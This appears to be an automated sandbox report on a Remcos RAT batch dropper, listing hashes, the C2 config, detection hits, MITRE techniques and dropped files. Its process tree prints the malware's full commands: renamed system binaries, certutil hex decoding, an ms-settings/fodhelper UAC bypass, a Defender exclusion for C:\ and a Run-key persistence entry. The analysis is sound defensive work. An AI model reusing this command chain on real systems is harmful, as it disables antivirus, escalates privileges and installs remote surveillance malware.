remcos | 1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
17/05/2024, 01:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat
Size

2.7MB
MD5

71a2e0b401912d66e4562712b5af765e
SHA1

5a1b5442baab4f7247002ad14fe7ba54467c7b96
SHA256

1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263
SHA512

9439ca8bfbba2f104cc947e177dc98d14cbd9b579b535aadc446446fb6707ec8bd4ab22efd96e2f1dda4e73516ff68046fd4b3bf6bfbb98a7e52ab49416a8859
SSDEEP

24576:srxwK+DtoQXo3twW5xYRLgd9b+n7ARtI7zv2ziFjbxG4VuxBJGhRCpC:srxwK+DtpPW56s9b+n7ARi7zv2w9G5C

Score

10^/10

remcos remotehost persistence rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

89.117.145.5:2404

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-Z1AWP0
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 14 IoCs

resource	yara_rule
behavioral2/memory/2000-84-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-83-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-85-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-86-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-87-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-89-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-90-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-91-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-92-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-93-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-95-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-94-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-96-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral2/memory/2000-97-0x0000000000400000-0x0000000000482000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 25 IoCs

pid	Process
640	alpha.exe
2668	alpha.exe
3988	alpha.exe
3012	alpha.exe
1880	kn.exe
2632	alpha.exe
1036	alpha.exe
948	alpha.exe
4540	alpha.exe
5036	xkn.exe
3500	alpha.exe
3564	ger.exe
1872	alpha.exe
3540	kn.exe
3796	per.exe
4628	alpha.exe
1164	Ping_c.pif
3244	alpha.exe
1612	alpha.exe
5068	alpha.exe
448	alpha.exe
2668	alpha.exe
2748	alpha.exe
740	alpha.exe
3104	alpha.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Htdihaig = "C:\\Users\\Public\\Htdihaig.url"	Ping_c.pif

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
31	drive.google.com
33	drive.google.com

Kills process with taskkill 1 IoCs

evasion

pid	Process
1568	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\ms-settings	ger.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	33	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	36	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
5036	xkn.exe
5036	xkn.exe
1164	Ping_c.pif
1164	Ping_c.pif

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5036	xkn.exe
Token: SeDebugPrivilege	1568	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 4844	1500	cmd.exe	84
PID 1500 wrote to memory of 4844	1500	cmd.exe	84
PID 1500 wrote to memory of 640	1500	cmd.exe	85
PID 1500 wrote to memory of 640	1500	cmd.exe	85
PID 1500 wrote to memory of 2668	1500	cmd.exe	86
PID 1500 wrote to memory of 2668	1500	cmd.exe	86
PID 1500 wrote to memory of 3988	1500	cmd.exe	88
PID 1500 wrote to memory of 3988	1500	cmd.exe	88
PID 3988 wrote to memory of 3732	3988	alpha.exe	89
PID 3988 wrote to memory of 3732	3988	alpha.exe	89
PID 1500 wrote to memory of 3012	1500	cmd.exe	90
PID 1500 wrote to memory of 3012	1500	cmd.exe	90
PID 3012 wrote to memory of 1880	3012	alpha.exe	91
PID 3012 wrote to memory of 1880	3012	alpha.exe	91
PID 1500 wrote to memory of 2632	1500	cmd.exe	92
PID 1500 wrote to memory of 2632	1500	cmd.exe	92
PID 2632 wrote to memory of 2264	2632	alpha.exe	93
PID 2632 wrote to memory of 2264	2632	alpha.exe	93
PID 1500 wrote to memory of 1036	1500	cmd.exe	94
PID 1500 wrote to memory of 1036	1500	cmd.exe	94
PID 1036 wrote to memory of 2188	1036	alpha.exe	95
PID 1036 wrote to memory of 2188	1036	alpha.exe	95
PID 1500 wrote to memory of 948	1500	cmd.exe	97
PID 1500 wrote to memory of 948	1500	cmd.exe	97
PID 948 wrote to memory of 4076	948	alpha.exe	98
PID 948 wrote to memory of 4076	948	alpha.exe	98
PID 1500 wrote to memory of 4540	1500	cmd.exe	99
PID 1500 wrote to memory of 4540	1500	cmd.exe	99
PID 4540 wrote to memory of 5036	4540	alpha.exe	100
PID 4540 wrote to memory of 5036	4540	alpha.exe	100
PID 5036 wrote to memory of 3500	5036	xkn.exe	101
PID 5036 wrote to memory of 3500	5036	xkn.exe	101
PID 3500 wrote to memory of 3564	3500	alpha.exe	103
PID 3500 wrote to memory of 3564	3500	alpha.exe	103
PID 1500 wrote to memory of 1872	1500	cmd.exe	104
PID 1500 wrote to memory of 1872	1500	cmd.exe	104
PID 1872 wrote to memory of 3540	1872	alpha.exe	105
PID 1872 wrote to memory of 3540	1872	alpha.exe	105
PID 1500 wrote to memory of 3796	1500	cmd.exe	108
PID 1500 wrote to memory of 3796	1500	cmd.exe	108
PID 1500 wrote to memory of 4628	1500	cmd.exe	113
PID 1500 wrote to memory of 4628	1500	cmd.exe	113
PID 4628 wrote to memory of 1568	4628	alpha.exe	115
PID 4628 wrote to memory of 1568	4628	alpha.exe	115
PID 1500 wrote to memory of 1164	1500	cmd.exe	119
PID 1500 wrote to memory of 1164	1500	cmd.exe	119
PID 1500 wrote to memory of 1164	1500	cmd.exe	119
PID 1500 wrote to memory of 3244	1500	cmd.exe	120
PID 1500 wrote to memory of 3244	1500	cmd.exe	120
PID 1500 wrote to memory of 1612	1500	cmd.exe	121
PID 1500 wrote to memory of 1612	1500	cmd.exe	121
PID 1500 wrote to memory of 5068	1500	cmd.exe	122
PID 1500 wrote to memory of 5068	1500	cmd.exe	122
PID 1500 wrote to memory of 448	1500	cmd.exe	123
PID 1500 wrote to memory of 448	1500	cmd.exe	123
PID 1500 wrote to memory of 2668	1500	cmd.exe	124
PID 1500 wrote to memory of 2668	1500	cmd.exe	124
PID 1500 wrote to memory of 2748	1500	cmd.exe	125
PID 1500 wrote to memory of 2748	1500	cmd.exe	125
PID 1500 wrote to memory of 740	1500	cmd.exe	126
PID 1500 wrote to memory of 740	1500	cmd.exe	126
PID 1500 wrote to memory of 3104	1500	cmd.exe	127
PID 1500 wrote to memory of 3104	1500	cmd.exe	127
PID 1164 wrote to memory of 3540	1164	Ping_c.pif	134

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Windows\System32\extrac32.exe
  C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
  2⤵
  PID:4844
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
  2⤵
  - Executes dropped EXE
  PID:640
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:2668
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3988
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    PID:3732
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3012
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\1fbb038040043d4a427658fde2cbfd58557ab54b9d104cc70eecb2829f788263.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
    3⤵
    - Executes dropped EXE
    PID:1880
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    PID:2264
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1036
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    PID:2188
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:948
- - C:\Windows\system32\extrac32.exe
    extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    PID:4076
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4540
- - C:\Users\Public\xkn.exe
    C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5036
  - - C:\Users\Public\alpha.exe
      "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3500
    - - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        5⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:3564
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1872
- - C:\Users\Public\kn.exe
    C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
    3⤵
    - Executes dropped EXE
    PID:3540
- C:\Windows \System32\per.exe
  "C:\\Windows \\System32\\per.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3796
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM SystemSettings.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1568
- C:\Users\Public\Libraries\Ping_c.pif
  C:\Users\Public\Libraries\Ping_c.pif
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1164
- - C:\Windows\SysWOW64\extrac32.exe
    C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Htdihaig.PIF
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\colorcpl.exe
    C:\Windows\System32\colorcpl.exe
    3⤵
    PID:2000
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
  2⤵
  - Executes dropped EXE
  PID:3244
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
  2⤵
  - Executes dropped EXE
  PID:1612
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
  2⤵
  - Executes dropped EXE
  PID:5068
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:448
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2668
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:2748
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:740
- C:\Users\Public\alpha.exe
  C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
  2⤵
  - Executes dropped EXE
  PID:3104

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:2848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_avt215ur.dfc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\Ping_c.pif

Filesize
894KB

MD5
a2749d1be508fa6598a7a328e117e20c

SHA1
5f208c710d73e3ff99a2204fe954830f78ed0301

SHA256
24d07136c34aeda669dd6d6f63464bbcc9501ff196296ace6e69a972d31a8cf7

SHA512
8749286189673e2349c66241c3112c23a092132d380b605bb21f4c998c470d210798ec9efac2b7f36503d7c859fea0f4ae2092541325154d8fbac3d11c415e82

Download Submit
C:\Users\Public\Ping_c.mp4

Filesize
1.7MB

MD5
e840d77e29c6093c411d3773def69d3a

SHA1
a8938e6fa40a088b456a3f39f8e96f15c2b980fb

SHA256
e8fd1824c00e608f08e6955ba4a2364b79cee19b4a05b3b5dff5ca13d56b36cd

SHA512
524cf98e5a4648080394c1db586ca354601ef0c191ada905fee79950db0263ee818a37c86769cf261b666ed3cf736d0514575f2a998778d21eb45e47b7d5df5c

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/1164-75-0x0000000000400000-0x00000000004E8000-memory.dmp

Filesize
928KB

Download
memory/2000-83-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-89-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-84-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-97-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-85-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-86-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-87-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-81-0x0000000004410000-0x0000000005410000-memory.dmp

Filesize
16.0MB

Download
memory/2000-90-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-91-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-92-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-93-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-95-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-94-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/2000-96-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/5036-36-0x000002119EA20000-0x000002119EA42000-memory.dmp

Filesize
136KB

Download